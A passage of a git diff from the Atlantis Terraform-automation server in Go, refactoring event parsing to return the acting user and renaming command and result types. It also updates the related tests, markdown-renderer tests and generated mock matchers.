*EventParser) ParseGitlabMergeEvent(event gitlab.MergeEvent) (models.Pul baseRepo, err := models.NewRepo(models.Gitlab, 
event.Project.PathWithNamespace, event.Project.GitHTTPURL, e.GitlabUser, e.GitlabToken) if err != nil { - return models.PullRequest{}, models.Repo{}, models.Repo{}, err + return models.PullRequest{}, models.Repo{}, models.Repo{}, models.User{}, err } headRepo, err := models.NewRepo(models.Gitlab, event.ObjectAttributes.Source.PathWithNamespace, event.ObjectAttributes.Source.GitHTTPURL, e.GitlabUser, e.GitlabToken) if err != nil { - return models.PullRequest{}, models.Repo{}, models.Repo{}, err + return models.PullRequest{}, models.Repo{}, models.Repo{}, models.User{}, err } pull := models.PullRequest{ @@ -197,7 +250,11 @@ func (e *EventParser) ParseGitlabMergeEvent(event gitlab.MergeEvent) (models.Pul BaseRepo: baseRepo, } - return pull, baseRepo, headRepo, err + user := models.User{ + Username: event.User.Username, + } + + return pull, baseRepo, headRepo, user, err } // ParseGitlabMergeCommentEvent creates Atlantis models out of a GitLab event. diff --git a/server/events/event_parser_test.go b/server/events/event_parser_test.go index 1415ffba3f..d7ef7fce70 100644 --- a/server/events/event_parser_test.go +++ b/server/events/event_parser_test.go @@ -102,34 +102,91 @@ func TestParseGithubIssueCommentEvent(t *testing.T) { Equals(t, *comment.Issue.Number, pullNum) } +func TestParseGithubPullEvent(t *testing.T) { + _, _, _, _, err := parser.ParseGithubPullEvent(&github.PullRequestEvent{}) + ErrEquals(t, "pull_request is null", err) + + testEvent := deepcopy.Copy(PullEvent).(github.PullRequestEvent) + testEvent.PullRequest.HTMLURL = nil + _, _, _, _, err = parser.ParseGithubPullEvent(&testEvent) + ErrEquals(t, "html_url is null", err) + + testEvent = deepcopy.Copy(PullEvent).(github.PullRequestEvent) + testEvent.Sender = nil + _, _, _, _, err = parser.ParseGithubPullEvent(&testEvent) + ErrEquals(t, "sender is null", err) + + testEvent = deepcopy.Copy(PullEvent).(github.PullRequestEvent) + testEvent.Sender.Login = nil + _, _, _, _, err = 
parser.ParseGithubPullEvent(&testEvent) + ErrEquals(t, "sender.login is null", err) + + actPull, actBaseRepo, actHeadRepo, actUser, err := parser.ParseGithubPullEvent(&PullEvent) + Ok(t, err) + expBaseRepo := models.Repo{ + Owner: "owner", + FullName: "owner/repo", + CloneURL: "https://github-user:github-token@github.com/owner/repo.git", + SanitizedCloneURL: Repo.GetCloneURL(), + Name: "repo", + VCSHost: models.VCSHost{ + Hostname: "github.com", + Type: models.Github, + }, + } + Equals(t, expBaseRepo, actBaseRepo) + Equals(t, expBaseRepo, actHeadRepo) + Equals(t, models.PullRequest{ + URL: Pull.GetHTMLURL(), + Author: Pull.User.GetLogin(), + Branch: Pull.Head.GetRef(), + HeadCommit: Pull.Head.GetSHA(), + Num: Pull.GetNumber(), + State: models.Open, + BaseRepo: expBaseRepo, + }, actPull) + Equals(t, models.User{Username: "user"}, actUser) +} + func TestParseGithubPull(t *testing.T) { testPull := deepcopy.Copy(Pull).(github.PullRequest) testPull.Head.SHA = nil - _, _, err := parser.ParseGithubPull(&testPull) + _, _, _, err := parser.ParseGithubPull(&testPull) ErrEquals(t, "head.sha is null", err) testPull = deepcopy.Copy(Pull).(github.PullRequest) testPull.HTMLURL = nil - _, _, err = parser.ParseGithubPull(&testPull) + _, _, _, err = parser.ParseGithubPull(&testPull) ErrEquals(t, "html_url is null", err) testPull = deepcopy.Copy(Pull).(github.PullRequest) testPull.Head.Ref = nil - _, _, err = parser.ParseGithubPull(&testPull) + _, _, _, err = parser.ParseGithubPull(&testPull) ErrEquals(t, "head.ref is null", err) testPull = deepcopy.Copy(Pull).(github.PullRequest) testPull.User.Login = nil - _, _, err = parser.ParseGithubPull(&testPull) + _, _, _, err = parser.ParseGithubPull(&testPull) ErrEquals(t, "user.login is null", err) testPull = deepcopy.Copy(Pull).(github.PullRequest) testPull.Number = nil - _, _, err = parser.ParseGithubPull(&testPull) + _, _, _, err = parser.ParseGithubPull(&testPull) ErrEquals(t, "number is null", err) - pullRes, _, err := 
parser.ParseGithubPull(&Pull) + pullRes, actBaseRepo, actHeadRepo, err := parser.ParseGithubPull(&Pull) Ok(t, err) + expBaseRepo := models.Repo{ + Owner: "owner", + FullName: "owner/repo", + CloneURL: "https://github-user:github-token@github.com/owner/repo.git", + SanitizedCloneURL: Repo.GetCloneURL(), + Name: "repo", + VCSHost: models.VCSHost{ + Hostname: "github.com", + Type: models.Github, + }, + } Equals(t, models.PullRequest{ URL: Pull.GetHTMLURL(), Author: Pull.User.GetLogin(), @@ -137,18 +194,10 @@ func TestParseGithubPull(t *testing.T) { HeadCommit: Pull.Head.GetSHA(), Num: Pull.GetNumber(), State: models.Open, - BaseRepo: models.Repo{ - Owner: "owner", - FullName: "owner/repo", - CloneURL: "https://github-user:github-token@github.com/owner/repo.git", - SanitizedCloneURL: Repo.GetCloneURL(), - Name: "repo", - VCSHost: models.VCSHost{ - Hostname: "github.com", - Type: models.Github, - }, - }, + BaseRepo: expBaseRepo, }, pullRes) + Equals(t, expBaseRepo, actBaseRepo) + Equals(t, expBaseRepo, actHeadRepo) } func TestParseGitlabMergeEvent(t *testing.T) { @@ -156,10 +205,10 @@ func TestParseGitlabMergeEvent(t *testing.T) { var event *gitlab.MergeEvent err := json.Unmarshal([]byte(mergeEventJSON), &event) Ok(t, err) - pull, repo, _, err := parser.ParseGitlabMergeEvent(*event) + pull, actBaseRepo, actHeadRepo, actUser, err := parser.ParseGitlabMergeEvent(*event) Ok(t, err) - expRepo := models.Repo{ + expBaseRepo := models.Repo{ FullName: "gitlabhq/gitlab-test", Name: "gitlab-test", SanitizedCloneURL: "https://example.com/gitlabhq/gitlab-test.git", @@ -178,14 +227,26 @@ func TestParseGitlabMergeEvent(t *testing.T) { HeadCommit: "da1560886d4f094c3e6c9ef40349f7d38b5d27d7", Branch: "ms-viewport", State: models.Open, - BaseRepo: expRepo, + BaseRepo: expBaseRepo, }, pull) - Equals(t, expRepo, repo) + Equals(t, expBaseRepo, actBaseRepo) + Equals(t, models.Repo{ + FullName: "awesome_space/awesome_project", + Name: "awesome_project", + SanitizedCloneURL: 
"http://example.com/awesome_space/awesome_project.git", + Owner: "awesome_space", + CloneURL: "http://gitlab-user:gitlab-token@example.com/awesome_space/awesome_project.git", + VCSHost: models.VCSHost{ + Hostname: "example.com", + Type: models.Gitlab, + }, + }, actHeadRepo) + Equals(t, models.User{Username: "root"}, actUser) t.Log("If the state is closed, should set field correctly.") event.ObjectAttributes.State = "closed" - pull, _, _, err = parser.ParseGitlabMergeEvent(*event) + pull, _, _, _, err = parser.ParseGitlabMergeEvent(*event) Ok(t, err) Equals(t, models.Closed, pull.State) } @@ -283,20 +344,20 @@ func TestNewCommand_CleansDir(t *testing.T) { for _, c := range cases { t.Run(c.Dir, func(t *testing.T) { - cmd := events.NewCommand(c.Dir, nil, events.Plan, false, "workspace", "", false) + cmd := events.NewCommand(c.Dir, nil, events.Plan, false, "workspace", "") Equals(t, c.ExpDir, cmd.Dir) }) } } func TestNewCommand_EmptyWorkspace(t *testing.T) { - cmd := events.NewCommand("dir", nil, events.Plan, false, "", "", false) + cmd := events.NewCommand("dir", nil, events.Plan, false, "", "") Equals(t, "default", cmd.Workspace) } func TestNewCommand_AllFieldsSet(t *testing.T) { - cmd := events.NewCommand("dir", []string{"a", "b"}, events.Plan, true, "workspace", "project", false) - Equals(t, events.Command{ + cmd := events.NewCommand("dir", []string{"a", "b"}, events.Plan, true, "workspace", "project") + Equals(t, events.CommentCommand{ Workspace: "workspace", Dir: "dir", Verbose: true, @@ -306,6 +367,52 @@ func TestNewCommand_AllFieldsSet(t *testing.T) { }, *cmd) } +func TestAutoplanCommand_CommandName(t *testing.T) { + Equals(t, events.Plan, (events.AutoplanCommand{}).CommandName()) +} + +func TestAutoplanCommand_IsVerbose(t *testing.T) { + Equals(t, false, (events.AutoplanCommand{}).IsVerbose()) +} + +func TestAutoplanCommand_IsAutoplan(t *testing.T) { + Equals(t, true, (events.AutoplanCommand{}).IsAutoplan()) +} + +func TestCommentCommand_CommandName(t 
*testing.T) { + Equals(t, events.Plan, (events.CommentCommand{ + Name: events.Plan, + }).CommandName()) + Equals(t, events.Apply, (events.CommentCommand{ + Name: events.Apply, + }).CommandName()) +} + +func TestCommentCommand_IsVerbose(t *testing.T) { + Equals(t, false, (events.CommentCommand{ + Verbose: false, + }).IsVerbose()) + Equals(t, true, (events.CommentCommand{ + Verbose: true, + }).IsVerbose()) +} + +func TestCommentCommand_IsAutoplan(t *testing.T) { + Equals(t, false, (events.CommentCommand{}).IsAutoplan()) +} + +func TestCommentCommand_String(t *testing.T) { + exp := `command="plan" verbose=true dir="mydir" workspace="myworkspace" project="myproject" flags="flag1,flag2"` + Equals(t, exp, (events.CommentCommand{ + Dir: "mydir", + Flags: []string{"flag1", "flag2"}, + Name: events.Plan, + Verbose: true, + Workspace: "myworkspace", + ProjectName: "myproject", + }).String()) +} + var mergeEventJSON = `{ "object_kind": "merge_request", "user": { diff --git a/server/events/executor.go b/server/events/executor.go index 10df87a764..b308e9d02c 100644 --- a/server/events/executor.go +++ b/server/events/executor.go @@ -18,5 +18,5 @@ package events // Executor is the generic interface implemented by each command type: // help, plan, and apply. type Executor interface { - Execute(ctx *CommandContext) CommandResponse + Execute(ctx *CommandContext) CommandResult } diff --git a/server/events/markdown_renderer.go b/server/events/markdown_renderer.go index acb0d86791..eb06c4ead7 100644 --- a/server/events/markdown_renderer.go +++ b/server/events/markdown_renderer.go @@ -58,7 +58,7 @@ type ProjectResultTmplData struct { // Render formats the data into a markdown string. 
// nolint: interfacer -func (m *MarkdownRenderer) Render(res CommandResponse, cmdName CommandName, log string, verbose bool, autoplan bool) string { +func (m *MarkdownRenderer) Render(res CommandResult, cmdName CommandName, log string, verbose bool, autoplan bool) string { commandStr := strings.Title(cmdName.String()) common := CommonData{commandStr, verbose, log} if res.Error != nil { @@ -73,10 +73,10 @@ func (m *MarkdownRenderer) Render(res CommandResponse, cmdName CommandName, log return m.renderProjectResults(res.ProjectResults, common) } -func (m *MarkdownRenderer) renderProjectResults(pathResults []ProjectResult, common CommonData) string { +func (m *MarkdownRenderer) renderProjectResults(results []ProjectResult, common CommonData) string { var resultsTmplData []ProjectResultTmplData - for _, result := range pathResults { + for _, result := range results { resultData := ProjectResultTmplData{ Workspace: result.Workspace, Dir: result.Path, diff --git a/server/events/markdown_renderer_test.go b/server/events/markdown_renderer_test.go index 202097e9be..040c47731e 100644 --- a/server/events/markdown_renderer_test.go +++ b/server/events/markdown_renderer_test.go @@ -45,18 +45,20 @@ func TestRenderErr(t *testing.T) { r := events.MarkdownRenderer{} for _, c := range cases { - res := events.CommandResponse{ - Error: c.Error, - } - for _, verbose := range []bool{true, false} { - t.Log("testing " + c.Description) - s := r.Render(res, c.Command, "log", verbose, false) - if !verbose { - Equals(t, c.Expected, s) - } else { - Equals(t, c.Expected+"
Log\n

\n\n```\nlog```\n

\n", s) + t.Run(c.Description, func(t *testing.T) { + res := events.CommandResult{ + Error: c.Error, } - } + for _, verbose := range []bool{true, false} { + t.Log("testing " + c.Description) + s := r.Render(res, c.Command, "log", verbose, false) + if !verbose { + Equals(t, c.Expected, s) + } else { + Equals(t, c.Expected+"
Log\n

\n\n```\nlog```\n

\n", s) + } + } + }) } } @@ -83,25 +85,27 @@ func TestRenderFailure(t *testing.T) { r := events.MarkdownRenderer{} for _, c := range cases { - res := events.CommandResponse{ - Failure: c.Failure, - } - for _, verbose := range []bool{true, false} { - t.Log("testing " + c.Description) - s := r.Render(res, c.Command, "log", verbose, false) - if !verbose { - Equals(t, c.Expected, s) - } else { - Equals(t, c.Expected+"
Log\n

\n\n```\nlog```\n

\n", s) + t.Run(c.Description, func(t *testing.T) { + res := events.CommandResult{ + Failure: c.Failure, + } + for _, verbose := range []bool{true, false} { + t.Log("testing " + c.Description) + s := r.Render(res, c.Command, "log", verbose, false) + if !verbose { + Equals(t, c.Expected, s) + } else { + Equals(t, c.Expected+"
Log\n

\n\n```\nlog```\n

\n", s) + } } - } + }) } } func TestRenderErrAndFailure(t *testing.T) { t.Log("if there is an error and a failure, the error should be printed") r := events.MarkdownRenderer{} - res := events.CommandResponse{ + res := events.CommandResult{ Error: errors.New("error"), Failure: "failure", } @@ -109,6 +113,15 @@ func TestRenderErrAndFailure(t *testing.T) { Equals(t, "**Plan Error**\n```\nerror\n```\n\n", s) } +func TestRenderAutoplanNoResults(t *testing.T) { + // If there are no project results during an autoplan we should still comment + // back because the user might expect some output. + r := events.MarkdownRenderer{} + res := events.CommandResult{} + s := r.Render(res, events.Plan, "", false, true) + Equals(t, "Ran `plan` in 0 projects because Atlantis detected no Terraform changes or could not determine where to run `plan`.\n\n", s) +} + func TestRenderProjectResults(t *testing.T) { cases := []struct { Description string @@ -121,9 +134,11 @@ func TestRenderProjectResults(t *testing.T) { events.Plan, []events.ProjectResult{ { - PlanSuccess: &events.PlanSuccess{ - TerraformOutput: "terraform-output", - LockURL: "lock-url", + ProjectCommandResult: events.ProjectCommandResult{ + PlanSuccess: &events.PlanSuccess{ + TerraformOutput: "terraform-output", + LockURL: "lock-url", + }, }, Workspace: "workspace", Path: "path", @@ -136,9 +151,11 @@ func TestRenderProjectResults(t *testing.T) { events.Apply, []events.ProjectResult{ { - ApplySuccess: "success", - Workspace: "workspace", - Path: "path", + ProjectCommandResult: events.ProjectCommandResult{ + ApplySuccess: "success", + }, + Workspace: "workspace", + Path: "path", }, }, "Ran Apply in dir: `path` workspace: `workspace`\n```diff\nsuccess\n```\n\n", @@ -150,17 +167,21 @@ func TestRenderProjectResults(t *testing.T) { { Workspace: "workspace", Path: "path", - PlanSuccess: &events.PlanSuccess{ - TerraformOutput: "terraform-output", - LockURL: "lock-url", + ProjectCommandResult: events.ProjectCommandResult{ + PlanSuccess: 
&events.PlanSuccess{ + TerraformOutput: "terraform-output", + LockURL: "lock-url", + }, }, }, { Workspace: "workspace", Path: "path2", - PlanSuccess: &events.PlanSuccess{ - TerraformOutput: "terraform-output2", - LockURL: "lock-url2", + ProjectCommandResult: events.ProjectCommandResult{ + PlanSuccess: &events.PlanSuccess{ + TerraformOutput: "terraform-output2", + LockURL: "lock-url2", + }, }, }, }, @@ -171,14 +192,18 @@ func TestRenderProjectResults(t *testing.T) { events.Apply, []events.ProjectResult{ { - Path: "path", - Workspace: "workspace", - ApplySuccess: "success", + Path: "path", + Workspace: "workspace", + ProjectCommandResult: events.ProjectCommandResult{ + ApplySuccess: "success", + }, }, { - Path: "path2", - Workspace: "workspace", - ApplySuccess: "success2", + Path: "path2", + Workspace: "workspace", + ProjectCommandResult: events.ProjectCommandResult{ + ApplySuccess: "success2", + }, }, }, "Ran Apply for 2 projects:\n1. workspace: `workspace` path: `path`\n1. workspace: `workspace` path: `path2`\n\n### 1. workspace: `workspace` path: `path`\n```diff\nsuccess\n```\n---\n### 2. 
workspace: `workspace` path: `path2`\n```diff\nsuccess2\n```\n---\n\n", @@ -188,7 +213,9 @@ func TestRenderProjectResults(t *testing.T) { events.Plan, []events.ProjectResult{ { - Error: errors.New("error"), + ProjectCommandResult: events.ProjectCommandResult{ + Error: errors.New("error"), + }, Path: "path", Workspace: "workspace", }, @@ -202,7 +229,9 @@ func TestRenderProjectResults(t *testing.T) { { Path: "path", Workspace: "workspace", - Failure: "failure", + ProjectCommandResult: events.ProjectCommandResult{ + Failure: "failure", + }, }, }, "Ran Plan in dir: `path` workspace: `workspace`\n**Plan Failed**: failure\n\n\n", @@ -214,20 +243,26 @@ func TestRenderProjectResults(t *testing.T) { { Workspace: "workspace", Path: "path", - PlanSuccess: &events.PlanSuccess{ - TerraformOutput: "terraform-output", - LockURL: "lock-url", + ProjectCommandResult: events.ProjectCommandResult{ + PlanSuccess: &events.PlanSuccess{ + TerraformOutput: "terraform-output", + LockURL: "lock-url", + }, }, }, { Workspace: "workspace", Path: "path2", - Failure: "failure", + ProjectCommandResult: events.ProjectCommandResult{ + Failure: "failure", + }, }, { Workspace: "workspace", Path: "path3", - Error: errors.New("error"), + ProjectCommandResult: events.ProjectCommandResult{ + Error: errors.New("error"), + }, }, }, "Ran Plan for 3 projects:\n1. workspace: `workspace` path: `path`\n1. workspace: `workspace` path: `path2`\n1. workspace: `workspace` path: `path3`\n\n### 1. workspace: `workspace` path: `path`\n```diff\nterraform-output\n```\n\n* To **discard** this plan click [here](lock-url).\n---\n### 2. workspace: `workspace` path: `path2`\n**Plan Failed**: failure\n\n---\n### 3. 
workspace: `workspace` path: `path3`\n**Plan Error**\n```\nerror\n```\n\n---\n\n", @@ -237,19 +272,25 @@ func TestRenderProjectResults(t *testing.T) { events.Apply, []events.ProjectResult{ { - Workspace: "workspace", - Path: "path", - ApplySuccess: "success", + Workspace: "workspace", + Path: "path", + ProjectCommandResult: events.ProjectCommandResult{ + ApplySuccess: "success", + }, }, { Workspace: "workspace", Path: "path2", - Failure: "failure", + ProjectCommandResult: events.ProjectCommandResult{ + Failure: "failure", + }, }, { Workspace: "workspace", Path: "path3", - Error: errors.New("error"), + ProjectCommandResult: events.ProjectCommandResult{ + Error: errors.New("error"), + }, }, }, "Ran Apply for 3 projects:\n1. workspace: `workspace` path: `path`\n1. workspace: `workspace` path: `path2`\n1. workspace: `workspace` path: `path3`\n\n### 1. workspace: `workspace` path: `path`\n```diff\nsuccess\n```\n---\n### 2. workspace: `workspace` path: `path2`\n**Apply Failed**: failure\n\n---\n### 3. workspace: `workspace` path: `path3`\n**Apply Error**\n```\nerror\n```\n\n---\n\n", @@ -258,18 +299,20 @@ func TestRenderProjectResults(t *testing.T) { r := events.MarkdownRenderer{} for _, c := range cases { - res := events.CommandResponse{ - ProjectResults: c.ProjectResults, - } - for _, verbose := range []bool{true, false} { - t.Run(c.Description, func(t *testing.T) { - s := r.Render(res, c.Command, "log", verbose, false) - if !verbose { - Equals(t, c.Expected, s) - } else { - Equals(t, c.Expected+"
Log\n

\n\n```\nlog```\n

\n", s) - } - }) - } + t.Run(c.Description, func(t *testing.T) { + res := events.CommandResult{ + ProjectResults: c.ProjectResults, + } + for _, verbose := range []bool{true, false} { + t.Run(c.Description, func(t *testing.T) { + s := r.Render(res, c.Command, "log", verbose, false) + if !verbose { + Equals(t, c.Expected, s) + } else { + Equals(t, c.Expected+"
Log\n

\n\n```\nlog```\n

\n", s) + } + }) + } + }) } } diff --git a/server/events/mocks/matchers/events_commandresponse.go b/server/events/mocks/matchers/events_commandname.go similarity index 53% rename from server/events/mocks/matchers/events_commandresponse.go rename to server/events/mocks/matchers/events_commandname.go index f596b2c4db..448c937abc 100644 --- a/server/events/mocks/matchers/events_commandresponse.go +++ b/server/events/mocks/matchers/events_commandname.go @@ -7,14 +7,14 @@ import ( events "github.com/runatlantis/atlantis/server/events" ) -func AnyEventsCommandResponse() events.CommandResponse { - pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(events.CommandResponse))(nil)).Elem())) - var nullValue events.CommandResponse +func AnyEventsCommandName() events.CommandName { + pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(events.CommandName))(nil)).Elem())) + var nullValue events.CommandName return nullValue } -func EqEventsCommandResponse(value events.CommandResponse) events.CommandResponse { +func EqEventsCommandName(value events.CommandName) events.CommandName { pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value}) - var nullValue events.CommandResponse + var nullValue events.CommandName return nullValue } diff --git a/server/events/mocks/matchers/events_commandresult.go b/server/events/mocks/matchers/events_commandresult.go new file mode 100644 index 0000000000..54269ef123 --- /dev/null +++ b/server/events/mocks/matchers/events_commandresult.go @@ -0,0 +1,20 @@ +package matchers + +import ( + "reflect" + + "github.com/petergtz/pegomock" + events "github.com/runatlantis/atlantis/server/events" +) + +func AnyEventsCommandResult() events.CommandResult { + pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(events.CommandResult))(nil)).Elem())) + var nullValue events.CommandResult + return nullValue +} + +func EqEventsCommandResult(value events.CommandResult) events.CommandResult { + 
pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value}) + var nullValue events.CommandResult + return nullValue +} diff --git a/server/events/mocks/matchers/models_projectcommandcontext.go b/server/events/mocks/matchers/models_projectcommandcontext.go new file mode 100644 index 0000000000..3f76b9a225 --- /dev/null +++ b/server/events/mocks/matchers/models_projectcommandcontext.go @@ -0,0 +1,20 @@ +package matchers + +import ( + "reflect" + + "github.com/petergtz/pegomock" + models "github.com/runatlantis/atlantis/server/events/models" +) + +func AnyModelsProjectCommandContext() models.ProjectCommandContext { + pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(models.ProjectCommandContext))(nil)).Elem())) + var nullValue models.ProjectCommandContext + return nullValue +} + +func EqModelsProjectCommandContext(value models.ProjectCommandContext) models.ProjectCommandContext { + pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value}) + var nullValue models.ProjectCommandContext + return nullValue +} diff --git a/server/events/mocks/matchers/ptr_to_events_command.go b/server/events/mocks/matchers/ptr_to_events_command.go index 91edd3b663..771aacf306 100644 --- a/server/events/mocks/matchers/ptr_to_events_command.go +++ b/server/events/mocks/matchers/ptr_to_events_command.go @@ -7,14 +7,14 @@ import ( events "github.com/runatlantis/atlantis/server/events" ) -func AnyPtrToEventsCommand() *events.Command { - pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(*events.Command))(nil)).Elem())) - var nullValue *events.Command +func AnyPtrToEventsCommand() *events.CommentCommand { + pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(*events.CommentCommand))(nil)).Elem())) + var nullValue *events.CommentCommand return nullValue } -func EqPtrToEventsCommand(value *events.Command) *events.Command { +func EqPtrToEventsCommand(value *events.CommentCommand) *events.CommentCommand { 
pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value}) - var nullValue *events.Command + var nullValue *events.CommentCommand return nullValue } diff --git a/server/events/mocks/matchers/ptr_to_events_commentcommand.go b/server/events/mocks/matchers/ptr_to_events_commentcommand.go new file mode 100644 index 0000000000..fbbbfcc15c --- /dev/null +++ b/server/events/mocks/matchers/ptr_to_events_commentcommand.go @@ -0,0 +1,20 @@ +package matchers + +import ( + "reflect" + + "github.com/petergtz/pegomock" + events "github.com/runatlantis/atlantis/server/events" +) + +func AnyPtrToEventsCommentCommand() *events.CommentCommand { + pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(*events.CommentCommand))(nil)).Elem())) + var nullValue *events.CommentCommand + return nullValue +} + +func EqPtrToEventsCommentCommand(value *events.CommentCommand) *events.CommentCommand { + pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value}) + var nullValue *events.CommentCommand + return nullValue +} diff --git a/server/events/mocks/matchers/ptr_to_github_pullrequestevent.go b/server/events/mocks/matchers/ptr_to_github_pullrequestevent.go new file mode 100644 index 0000000000..1952cf1f74 --- /dev/null +++ b/server/events/mocks/matchers/ptr_to_github_pullrequestevent.go @@ -0,0 +1,20 @@ +package matchers + +import ( + "reflect" + + github "github.com/google/go-github/github" + "github.com/petergtz/pegomock" +) + +func AnyPtrToGithubPullRequestEvent() *github.PullRequestEvent { + pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(*github.PullRequestEvent))(nil)).Elem())) + var nullValue *github.PullRequestEvent + return nullValue +} + +func EqPtrToGithubPullRequestEvent(value *github.PullRequestEvent) *github.PullRequestEvent { + pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value}) + var nullValue *github.PullRequestEvent + return nullValue +} diff --git a/server/events/mocks/matchers/ptr_to_models_repo.go 
b/server/events/mocks/matchers/ptr_to_models_repo.go new file mode 100644 index 0000000000..05ba1aef35 --- /dev/null +++ b/server/events/mocks/matchers/ptr_to_models_repo.go @@ -0,0 +1,20 @@ +package matchers + +import ( + "reflect" + + "github.com/petergtz/pegomock" + models "github.com/runatlantis/atlantis/server/events/models" +) + +func AnyPtrToModelsRepo() *models.Repo { + pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(*models.Repo))(nil)).Elem())) + var nullValue *models.Repo + return nullValue +} + +func EqPtrToModelsRepo(value *models.Repo) *models.Repo { + pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value}) + var nullValue *models.Repo + return nullValue +} diff --git a/server/events/mocks/matchers/slice_of_models_projectcommandcontext.go b/server/events/mocks/matchers/slice_of_models_projectcommandcontext.go new file mode 100644 index 0000000000..08974c59cd --- /dev/null +++ b/server/events/mocks/matchers/slice_of_models_projectcommandcontext.go @@ -0,0 +1,20 @@ +package matchers + +import ( + "reflect" + + "github.com/petergtz/pegomock" + models "github.com/runatlantis/atlantis/server/events/models" +) + +func AnySliceOfModelsProjectCommandContext() []models.ProjectCommandContext { + pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*([]models.ProjectCommandContext))(nil)).Elem())) + var nullValue []models.ProjectCommandContext + return nullValue +} + +func EqSliceOfModelsProjectCommandContext(value []models.ProjectCommandContext) []models.ProjectCommandContext { + pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value}) + var nullValue []models.ProjectCommandContext + return nullValue +} diff --git a/server/events/mocks/mock_command_runner.go b/server/events/mocks/mock_command_runner.go index 481fcf72f5..8ef3387c0d 100644 --- a/server/events/mocks/mock_command_runner.go +++ b/server/events/mocks/mock_command_runner.go @@ -19,9 +19,14 @@ func NewMockCommandRunner() *MockCommandRunner { return 
&MockCommandRunner{fail: pegomock.GlobalFailHandler} } -func (mock *MockCommandRunner) ExecuteCommand(baseRepo models.Repo, headRepo models.Repo, user models.User, pullNum int, cmd *events.Command) { - params := []pegomock.Param{baseRepo, headRepo, user, pullNum, cmd} - pegomock.GetGenericMockFrom(mock).Invoke("ExecuteCommand", params, []reflect.Type{}) +func (mock *MockCommandRunner) RunCommentCommand(baseRepo models.Repo, maybeHeadRepo *models.Repo, user models.User, pullNum int, cmd *events.CommentCommand) { + params := []pegomock.Param{baseRepo, maybeHeadRepo, user, pullNum, cmd} + pegomock.GetGenericMockFrom(mock).Invoke("RunCommentCommand", params, []reflect.Type{}) +} + +func (mock *MockCommandRunner) RunAutoplanCommand(baseRepo models.Repo, headRepo models.Repo, pull models.PullRequest, user models.User) { + params := []pegomock.Param{baseRepo, headRepo, pull, user} + pegomock.GetGenericMockFrom(mock).Invoke("RunAutoplanCommand", params, []reflect.Type{}) } func (mock *MockCommandRunner) VerifyWasCalledOnce() *VerifierCommandRunner { @@ -42,32 +47,32 @@ type VerifierCommandRunner struct { inOrderContext *pegomock.InOrderContext } -func (verifier *VerifierCommandRunner) ExecuteCommand(baseRepo models.Repo, headRepo models.Repo, user models.User, pullNum int, cmd *events.Command) *CommandRunner_ExecuteCommand_OngoingVerification { - params := []pegomock.Param{baseRepo, headRepo, user, pullNum, cmd} - methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "ExecuteCommand", params) - return &CommandRunner_ExecuteCommand_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations} +func (verifier *VerifierCommandRunner) RunCommentCommand(baseRepo models.Repo, maybeHeadRepo *models.Repo, user models.User, pullNum int, cmd *events.CommentCommand) *CommandRunner_RunCommentCommand_OngoingVerification { + params := []pegomock.Param{baseRepo, maybeHeadRepo, user, pullNum, cmd} 
+ methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "RunCommentCommand", params) + return &CommandRunner_RunCommentCommand_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations} } -type CommandRunner_ExecuteCommand_OngoingVerification struct { +type CommandRunner_RunCommentCommand_OngoingVerification struct { mock *MockCommandRunner methodInvocations []pegomock.MethodInvocation } -func (c *CommandRunner_ExecuteCommand_OngoingVerification) GetCapturedArguments() (models.Repo, models.Repo, models.User, int, *events.Command) { - baseRepo, headRepo, user, pullNum, cmd := c.GetAllCapturedArguments() - return baseRepo[len(baseRepo)-1], headRepo[len(headRepo)-1], user[len(user)-1], pullNum[len(pullNum)-1], cmd[len(cmd)-1] +func (c *CommandRunner_RunCommentCommand_OngoingVerification) GetCapturedArguments() (models.Repo, *models.Repo, models.User, int, *events.CommentCommand) { + baseRepo, maybeHeadRepo, user, pullNum, cmd := c.GetAllCapturedArguments() + return baseRepo[len(baseRepo)-1], maybeHeadRepo[len(maybeHeadRepo)-1], user[len(user)-1], pullNum[len(pullNum)-1], cmd[len(cmd)-1] } -func (c *CommandRunner_ExecuteCommand_OngoingVerification) GetAllCapturedArguments() (_param0 []models.Repo, _param1 []models.Repo, _param2 []models.User, _param3 []int, _param4 []*events.Command) { +func (c *CommandRunner_RunCommentCommand_OngoingVerification) GetAllCapturedArguments() (_param0 []models.Repo, _param1 []*models.Repo, _param2 []models.User, _param3 []int, _param4 []*events.CommentCommand) { params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations) if len(params) > 0 { _param0 = make([]models.Repo, len(params[0])) for u, param := range params[0] { _param0[u] = param.(models.Repo) } - _param1 = make([]models.Repo, len(params[1])) + _param1 = make([]*models.Repo, len(params[1])) for u, param := range params[1] { - _param1[u] = param.(models.Repo) + 
